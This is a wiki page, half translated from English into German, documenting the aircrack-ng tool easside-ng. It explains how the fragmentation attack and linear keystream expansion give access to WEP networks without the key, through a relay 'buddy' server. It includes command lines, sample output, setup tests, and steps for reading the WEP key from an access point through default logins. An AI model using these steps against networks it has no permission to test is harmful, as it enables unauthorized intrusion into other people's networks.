Easside-ng
Aus Wardriving-Forum.de Enzyklopädie
[Bearbeiten] Easside-ng
+++ Übersetzung in Arbeit - Wenn jeder nur einen Absatz übersetzt in dieses HowTo auch schnell in deutsch verfügbar +++
[Bearbeiten] Beschreibung
Funktion: Easside-ng ist ein Tool welches eine automatische Kommunikation mit einem Router ohne WEP-Schlüssel ermöglicht.
Es wird von easside eine Fake-Authentification und danach eine Fragmentation-Attack durchgeführt, danach ist man auf MAC-Ebene verbunden. Nun kommt auch bei einem gewöhnlichen Clienten die DHCP-Anfrage. Diese können wir ebenfalls senden, da wir ja durch die Fragmentation Attacke einen kompletten keystream haben - Verschlüsseln geht also.
Die Antwort des DHCP-Servers können wir natürlich nicht direkt entschlüsseln, deshalb bauen wir uns mit dem bekannten Keystream ein neues IP-Paket, welches ebenfalls an unsere öffentliche IP des Buddy Servers gerichtet ist.
Als Dateninhalt dieses Paketes verwenden wir die Antwort des DHCP-servers. Dieses Paket schicken wir an den AP, der es für uns entschlüsselt und unverschlüsselt an den Buddy-Server weiterschickt. Dieser gibt es wiederum an easside weiter und damit kennen wir die unverschlüsselte Antwort des DHCP-Servers und können eben genau auf diese Art und Weise beliebig im Netz arbeiten, da wir alles über den AP->buddy->easside entschlüsseln können. Der Ping ist dabei nicht der beste (abhängig vom ping AP->buddy->easside), aber es lässt sich das Netz benutzen.
It first identifies ein Netzwerk, then proceeds to associate with it, obtain PRGA (pseudo random generation algorithm) xor data, determine the network IP scheme and then setup a TAP interface so that you can communicate with the AP without requiring the WEP key. All this is done without your intervention.
There sind zwei primary papers "The Fragmentation Attack in Practice" by Andrea Bittau and "The Final Nail in WEP's Coffin" by Andrea Bittau, Mark Handley and Josua Lockey welche are of interest. See the the [page] for these papers und more. Diese Unterlagen referenced provide excellent Hintergrund Information if you would like to understand the underlying methodologies. The concepts for the fragment attack currently incorporated in aircrack-ng came from these papers.
In order to access the wireless network without knowing the WEP key is done by having the AP itself decrypt the packets. This is achieved having a "buddy" process running on a server accessible on the Internet. This "buddy" server echoes back the decrypted packets to the system running easside-ng. This imposes a number of critical requirements for easside-ng to work:
* The target access point must be able to communicate with the Internet. * A "buddy" server must exist on the Internet without firewalling of the port used by easside-ng. The default is TCP and UDP port 6969. * The system running easside-ng must have access to the Internet and be able to communicate with the "buddy" server.
Es gibt zwei allgemeine Phasen:
* Verbindung mit dem Netzwerk herstellen. * Mit dem Netzwerk kommunizieren.
Näheres dazu wird gleich beschrieben.
[Bearbeiten] Verbindung herstellen
Folgende Punkte werden während der Verbindungsphase von essside-ng abgearbeitet:
- Channel hops suchen nach einem WEP Netzwerk. - Wenn ein Netzwerk gefunden wird versucht sich easside-ng zu authentifizieren. - Nach erfolreicher Authentifiziert versucht sich das Tool mit dem AP zu verbinden. - Nach dem ein einziges Datenpaket erfolgreich gesnifft wurde versucht easside-ng mindestens 1054 Bytes des PRGA zu erhalten. Man nennt das auch fragmentation Angriff. Der PRGA wird in das pgra.log geschrieben. - Anschließend wird das IP Netzwerk entschlüsselt, indem wir durch Multicast Frames und Linear Keystream expansion Technik die nächsten 4 Bytes des PRGA erhalten.
Durch die Entschlüsselung der ARP-Anfrage kann das Netzwerkschema bestimmt werden. Das ist notwendig um den ARP-Reqest für die Injection zu erstellen. Easside-ng kann auch ein IP-Paket verarbeiten um das Netzwerkschema zu bestimmen, das dauert nur etwas länger.
- eassige-ng stellt eine permanente TCP Verbindung mit dem Buddy Server her und prüft die Konnektivität - ARPs um die MAC addresses des Routers und Source-IÜ. Standard ist .1 für die Router- und .123 für die Client IP. - Es testet die Konnektivität via AccessPoint und bestimmt die Internet IP-Adresse des AP`s.
Darüber hinaus listet es die RoundTripTime der Test-Pakete. Das gibt uns einen Eindruck der Verbindungs Qualität.
- Das TAP-Interface wird dann erstellt
An diesem Punk starten wir
ifconfig at0 up
und können mit jedem Host des WLAN Netzwerkes über das TAP-Interface kommunizieren. Behaltet euch vor Augen dass man den WEP-Key dazu nicht benötigt !! Das TAP-Interface ist ein virtuelles Interface das sich sich genaus verhält als wäre es das madwifi interface mit dem richtigen WEP-Key. Wir können IP`s vergeben, DCHP nutzen usw.
[Bearbeiten] Welche Rolle spielt der Buddy server ?
Ich versuche das Prinzip kurz zu erklären.
* Wir sniffen ein verschlüsseltes Paket über WLAN. * Angenommen das Paket geht auf google.de würde das Paket in Klartext angezeigt. Das Internet benutzt kein WEP * Der Grundgedanke ist das Paket zurückzuschicken, aber anstatt an die ursprüngliche Adresse, schicken wir es an den Buddy Server im Internet. * Der Buddy Server erhält das Paket entschlüsselt als Klartext und schickt es dann an wieder uns zurück.
[Bearbeiten] Communication with the WIFI network
The following describes this diagram in more detail. \\ \\ \\ Datei:Beispiel.jpg \\ \\ So you may be asking "What is the magic? How can you access the WIFI network without knowing the WEP key?". The method is quite simple yet ingenious.
Lets look at the details of sending and receiving packets via the at0 TAP interface.
Sending packets:
* A packet is given to the at0 (TAP interface) based on the local network routing table. Depending on what destination IP address you are trying to communicate with, you may have to manually add static routing entries. By default, the wifi network is added to the routing table for you. * The TAP interface hands the packet over to easside-ng * Easside-ng then encrypts it for injection using the PRGA gathered in the initial connectivity phase. * Easside-ng then injects the packet into the wifi network via the wireless device.
Receiving packets:
* A source device (wired or wireless) sends a packet destined for the IP assigned to the ath0 interface or to a broadcast destination. The AP transmits the packet into the air. * Easside-ng constantly listens to the packets being transmitted by the AP. It then processes packets addressed to the TAP IP based on the MAC address or broadcasts. * For each packet it needs to process, the packet must first be decrypted. This will be done in multiple steps. The steps follow. * Easside-ng creates a new packets composed of two fragments. The first fragment has no data, it simply has the destination IP of the buddy-server. This fragment is encrypted using the PRGA (keystream). The second fragment contains the packet to be decrypted. Since this packet is already encrypted, it is used "as is". This new packet consistently of two fragments is then injected into the wifi network. * The AP receives the fragmented packet, decrypts each fragment and reassembles the fragments into a single packet. Since the destination IP of the reassembled packet is the buddy-server, it forwards it to the buddy server. You should note that the AP was kind enough to decrypt the packet for you! * The buddy server receives the decrypted packet from the AP by UDP. It then resends the decrypted information back to easside-ng. * Easside-ng then sends the decrypted packet out the at0 (TAP) interface.
[Bearbeiten] Fragmentation Technik
This section provides a brief explanation of the fragmentation technique used in easside-ng.
This technique, when successful, can obtain 1504 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to encrypt packets you want to transmit. It requires at least one data packet to be received from the access point in order to initiate the attack.
Basically, the program obtains a small amount of keying material from the packet then attempts to send packets with known content to the access point (AP). If the packet is successfully echoed back by the AP then a larger amount of keying information can be obtained from the returned packet. This cycle is repeated several times until 1504 bytes of PRGA are obtained.
The original paper, [Fragmentation Attack in Practice], by Andrea Bittau provides a much more detailed technical description of the technique. A local copy is located [[1]]. Here are [slides] of a related paper. A local copy of the slides is located [[2]]. Also see the paper "The Final Nail in WEP's Coffin" on this page.
[Bearbeiten] Linear Keystream Expansion Technik
This section provides a brief explanation of the linear keystream expansion technique used in easside-ng.
So you may also be asking "What is the linear keystream expansion technique?". The foundation is the fact that packets like an encrypted ARP request can easily be identified combined with the fact that the start of it has known plain text.
The program first obtains the PRGA from known plain text portion of the ARP request. Then it creates a new ARP request packet broken into two fragments. The first fragment is one more byte then the know PRGA and the PRGA is guessed for the extra byte. These guesses are sent and the program listens to see which one is replayed by the AP. The replayed packet has the correct PRGA and this value was included in the destination multicast address. Now that we know the correct PRGA, one more byte can be decrypted in the original ARP request. This process is repeated until the sending IP in the original ARP request is decrypted. It takes a maximum of 256 guesses to determine the correct PRGA for a particular byte and on average only 128 guesses.
The linear keystream expansion technique (Arbaugh inductive) is reverse chopchop. Chopchop decrypts packets from back to the front. Linear decrypts packets from the front to the back. Actually, chopchop is reverse Arbaugh.
[Bearbeiten] Easside-ng compared to Wesside-ng
The companion aircrack-ng suite program to easside-ng is wesside-ng. Here is a brief comparison of the two tools:
^Feature^easside-ng^wesside-ng^ |Stability of the program|Stable|Proof of concept| |Finds a MAC address to spoof|No|Yes| |Fake Authentication to AP|Yes|Yes| |Can use ARP packets for fragmentation|Yes|Yes| |Can use IP packets for fragmentation|Yes|No| |Fragmentation attack to obtain PRGA|Yes|Yes| |Linear Keystream Expansion Technique|Yes|Yes| |Communication with wifi network without WEP key|Yes|No| |Network ARP request flooding|No|Yes| |Aircrack-ng PTW attack|No|Yes| |Recovers WEP key|No|Yes|
[Bearbeiten] Warum easside-ng wenn aircrack-ng PTW schon kann?
* easside-ng kam ein Jahr vor PTW raus. * easside-ng ist praktisch für einen schnellen und heimlichen Angriff. * Es ist signifikant schneller als PTW. * Ein "Instant-Tool" das kein flooding benötigt.
[Bearbeiten] Befehl
easside-ng <args>
Erklärung:
* -h Displays the list of options. * -v MAC address of the Acess Point (Optional) * -m Source MAC address to be used (Optional) * -i Source IP address to be used on the wireless LAN. Defaults to the decoded network plus ".123" (Optional) * -r IP address of the AP router. This could be the WAN IP of the AP or an actual router IP depending on the topology. Defaults to the decoded network plus ".1". (Optional) * -s IP address of the "buddy" server (Mandatory) * -f Wireless interface name. (Mandatory) * -c Locks the card to the specified channel (Optional)
buddy-ng
Achtung: Es gibt keine Parameter für buddy-ng. Buddy-ng hört auf TCP-Port 6969 und UDP-Port 6969. TCP wird für die dauerhafte Verbindung zuwischen esside-ng und buddy-ng benötigt. UDP wird benutzt um entschlüsselte Pakete vom AP zu empfangen.
Sobald easside-ng gestartet ist wird automatisch ein prga.log File im aktuellen Ordner angelegt:
* prga.log - Beinhaltet den PRGA aus dem fragmentation Angriff.
Achtungn: Unbedingt prga.log löschen wenn ein anderer Target-AP benutzt werden soll
[Bearbeiten] Beispiel
[Bearbeiten] Specific AP Usage Example
Be sure to use airmon-ng to put your card into monitor mode.
First, you need to start a buddy server. This needs to be located on the Internet and be accessible from the system running easside-ng via TCP. It must also be accessible from the AP via UDP. Port 6969 cannot be firewalled on it.
You start the buddy sever:
buddy-ng
It responds:
buddy-ng Waiting for connexion
When easside-ng connects, it responds similar to:
Got connection from 10.113.65.187 Handshake complete Inet check by 10.113.65.187 1
The IP 10.113.65.187 above is the IP of the system running easside-ng.
Now run easside-ng:
easside-ng -f ath0 -v 00:14:6C:7E:40:80 -c 9 -s 10.116.23.144
Where:
* -f ath0 This is the wireless interface name. * -v 00:14:6C:7E:40:80 The is the MAC address of the AP. * -c 9 This is the channel the AP is on. * -s 10.116.23.144 This is the buddy server IP.
The system responds:
Setting tap MTU Sorting out wifi MAC MAC is 00:08:D4:86:7E:98 Setting tap MAC [14:40:06.596419] Ownin...
SSID teddy Chan 9 Mac 00:14:6C:7E:40:80 Sending auth request Authenticated Sending assoc request Associated: 1 Assuming ARP 54 [14:40:13.537842] Got 22 bytes of PRGA IV [4B:02:00] [14:40:13.545021] Got 58 bytes of PRGA IV [4C:02:00] [14:40:13.648670] Got 166 bytes of PRGA IV [4D:02:00] [14:40:13.753087] Got 490 bytes of PRGA IV [4E:02:00] [14:40:13.863819] Got 1462 bytes of PRGA IV [4F:02:00] [14:40:13.966753] Got 1504 bytes of PRGA IV [50:02:00] Assuming ARP 36 [15:23:42.047332] Guessing prga byte 22 with 16 ARP IP so far: 192 [15:23:42.749330] Guessing prga byte 23 with 3F ARP IP so far: 192.168 [15:23:43.815329] Guessing prga byte 24 with 60 ARP IP so far: 192.168.1 My IP 192.168.1.123 Rtr IP 192.168.1.1 Sending who has 192.168.1.1 tell 192.168.1.123 Rtr MAC 00:14:6C:7E:40:80 Trying to connect to buddy: 10.116.23.144:6969 Connected Handshake compl33t Checking for internet... 1 Internet w0rx. Public IP 10.113.65.187 Rtt 77ms
At this point, you need to bring up the TAP interface:
ifconfig at0 up
Now you can send and receive packets to and from the AP network which in this case is 192.168.1.0/24 via the at0 inteface. Notice that you don't need a WEP key to do this! The TAP interface is a virtual interface that acts as if it were the wifi interface with the correct WEP key configured. You can assign an IP, use DHCP with it and so on. By default, the at0 interface is assigned the network obtained at the start plus ".123".
[Bearbeiten] Scanning for APs Usage Example
The "Specific AP Usage Example" is for targeting a single Access Point on a specific channel. You can also let easside-ng scan for APs by using "easside-ng -f ath0 -s 10.116.23.144".
[Bearbeiten] Usage Tips
[Bearbeiten] Combining easside-ng and wesside-ng
As you may know, wesside-ng is a proof-of-concept tool which is rich in functionality, but is not as stable and bug-free compared to easside-ng. You can combine the strengths of wesside-ng and easside-ng together.
First run easside-ng to obtain the prga file. Then run wesside-ng to flood the network and obtain the WEP key. It is really that simple!
Playfully, this is known as "besside-ng".
[Bearbeiten] Demonstrating Insecurity!
IMPORTANT: You must have written permission from the owner of the AP prior to using the instructions in this section. It is illegal to access networks which do not belong to you.
A clever way to demonstrate the insecurity of WEP networks and access points:
* Use easside-ng to create an access mechanism to the WIFI network. * Log into the AP with your favourite browser. 99% of the time, the APs have default ids and passwords. Many times there are no passwords set. Once logged into the AP, you can go to the WEP settings page and read off the WEP key from the configuration page. In some cases, where there are asterisks (*) for the key, you may need to look at the HTML source or use a tool to reveal the password. * Now you can configure your wireless card with the WEP key and access the network normally.
[Bearbeiten] Test Setup
This section will discuss what works and what does not work with regards to testing easside-ng against your own wireless LAN.
6969 is the standard port used by easside-ng and buddy-ng. If you change it, then of course, use the revised port number in all references below.
First, some simple assumptions about your wireless LAN:
* It has access to the Internet. * Outbound UDP port 6969 to the Internet is not blocked. Some firewalls only allow communication on ports which have been explicitly allowed. * You have tested your ability to connect to the buddy-ng server. See how to perform this test below.
Assumptions about your buddy-ng server:
* It is running on Internet with a routeable IP address * It is accessable by both the system running easside-ng and the wireless LAN * Inbound and outbound UDP and TCP port 6969 is permitted.
Assumptions about the system running easside-ng;
* It is running on Internet with a routeable IP address. * Outbound TCP port 6969 to the Internet is not blocked. Some firewalls only allow communication on ports which have been explicitly allowed. * You have tested your ability to connect to the buddy-ng server. See how to perform this test below. * It contains a wireless device supported by aircrack-ng and it is in monitor mode.
The easiest way to test connectivity to the buddy-ng server is by using telnet. Be sure to start your buddy server process prior to doing this test! Otherwise it will fail for sure.
Enter:
telnet <ip of buddy server> 6969
The system should respond:
Trying <ip of buddy server>... Connected to <ip of buddy server>. Escape character is '^]'.
The buddy server should look like this:
Waiting for connexion Got connection from <ip of the easside-ng system>
When you terminate the telnet session, it should look like this:
That was it Waiting for connexion
The above examples show a successful test. If your test fails then use tcpdump or wireshark on the source and destination systems to sniff port 6969. Determine the problem with these tools and others then correct the root problem.
If you are running easside-ng and buddy-ng on the same system then the system must have a routeable Internet IP address. You cannot be on a LAN behind a firewall which does network address translation (NAT).
The ideal situation is to have the buddy-ng server running on a separate system someplace on the Internet. Then have a second system with easside-ng running with a routeable IP address.
[Bearbeiten] Tap interface under Windows
To obtain a tap interface in a MS Windows environment, install OpenVPN.
[Bearbeiten] Fehlerbehebung
* Ist deine Karte im Monitor Mode?
* Kann deine Karte injecten. Kontrolliere es mit dem aireplay-ng injection test. Besteht eine Verbindung zwischen der Karte und dem AP?
* Kannst du mit deiner Karte eine Fragmention Attacke durchführen? Kontrolliere dies mit dem aireplay-ng injection test.
* Make sure to delete **prga.log** if you are changing access points or if you want to restart cleanly. In general, if you have problems, it is a good idea to delete it.
* There are a few known limitations: * Only open authentication is support. Shared key authentication is not supported. * Nur B und G Netzwerke werden unterstützt.
